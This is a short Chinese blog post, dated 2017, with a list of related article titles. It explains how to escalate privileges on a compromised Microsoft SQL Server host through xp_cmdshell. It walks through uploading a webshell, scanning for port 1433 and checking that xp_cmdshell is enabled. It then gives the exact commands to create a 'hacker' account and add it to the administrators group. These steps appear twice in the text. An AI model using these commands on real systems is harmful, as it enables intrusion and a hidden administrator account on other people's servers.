mssqlserver xp_cmdshell提权
2017-11-30 16:36
176 查看
首先把大马上传上去,再webshell.asp上进行操作
进行端口扫描,发现有1433端口存在,说明有mssql数据库
在sql操作命令处,进行输入命令:select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell‘ 查看xp_cmdshell是否开启
添加系统账号:exec master.dbo.xp_cmdshell 'net user hacker 123456 /add'
加入管理员组:exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'
进行端口扫描,发现有1433端口存在,说明有mssql数据库
在sql操作命令处,进行输入命令:select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell‘ 查看xp_cmdshell是否开启
添加系统账号:exec master.dbo.xp_cmdshell 'net user hacker 123456 /add'
加入管理员组:exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'
相关文章推荐
- [提权禁区] SQL语句利用xp_cmdshell获取权限
- 调用MSSQLSERVER的系统过程xp_cmdshell发生错误:xpsql.cpp: 错误 来自 GetProxyAccount
- SQL注入中利用XP_cmdshell提权的用法
- SQL注入中利用XP_cmdshell提权的用法
- SQL注入中利用XP_cmdshell提权的用法(转)
- MsSql 提权xp_cmdshell失败后的两种方法
- SQL注入中利用XP_cmdshell提权的用法(转)
- sql xp_cmdshell
- 关于master..xp_cmdshell’的几个错误解决办法
- 解读xp_cmdshell扩展存储过程
- SQL SERVER 2005开启xp_cmdshell的方法
- 禁用xp_cmdshell
- 不需xp_cmdshell支持在有注入漏洞的sql服务器上运行cmd命令_数据库安全
- [转]关于xp_cmdshell 。。注意安全!
- SQL Server 2005 2008 xp_cmdshell 恢复与禁用
- 关于xp_cmdshell
- Dos打开sp_configure启用xp_cmdshell
- SQL Server如何启用xp_cmdshell组件
- SQL SERVER 2005开启xp_cmdshell的方法
- SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_co